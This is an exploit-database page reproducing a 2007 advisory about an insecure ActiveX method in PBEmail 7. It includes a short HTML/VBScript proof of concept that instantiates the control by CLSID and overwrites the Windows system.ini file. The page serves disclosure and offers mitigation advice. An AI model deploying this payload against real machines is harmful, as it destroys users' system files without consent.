header-logo
Suggest Exploit
vendor:
PBEmail 7 ActiveX Edition
by:
Katatafish
N/A
CVSS
N/A
Insecure method
CWE
Product Name: PBEmail 7 ActiveX Edition
Affected Version From: PBEmail 7 ActiveX Edition
Affected Version To: PBEmail 7 ActiveX Edition
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP2 with Internet Explorer 7
2007

Insecure method in PBEmail 7 ActiveX Edition

The PBEmail 7 ActiveX Edition software is vulnerable to an insecure method, specifically the SaveSenderToXml function in the PBEmail7Ax.dll file. This vulnerability allows an attacker to overwrite arbitrary files on the system, as demonstrated in the provided script.

Mitigation:

It is recommended to update to a patched version of the software, if available. Additionally, restrict access to the affected ActiveX component to trusted sources.
Source

Exploit-DB raw data:

<pre>
<b>Found by</b>: Katatafish (karatatata{at}hush{dot}com)
<b>software</b>:PBEmail 7 ActiveX Edition
<b>Vendor:</b> http://www.perfectionbytes.com
<b>vulnerability</b>: Insecure method
SaveSenderToXml(XmlFilePath: BSTR); stdcall; in PBEmail7Ax.dll
<b>Tested on Internet explorer 7 with Windows XP SP 2.</b>
<b>Thanks:</b> str0ke

</pre>

<object classid="clsid:30C0FDCB-53BE-4DB3-869D-32BF2DAD0DEC" 
id="kat"></object>	
<script language="vbscript">
  kat.SaveSenderToXml "C:\WINDOWS\system.ini"
  MyMsg = MsgBox ("Done! Your C:\WINDOWS\system.ini file should now 
be overwriten.")
</script>

# milw0rm.com [2007-10-12]

Navigation

Suggest Exploit

Services By CQR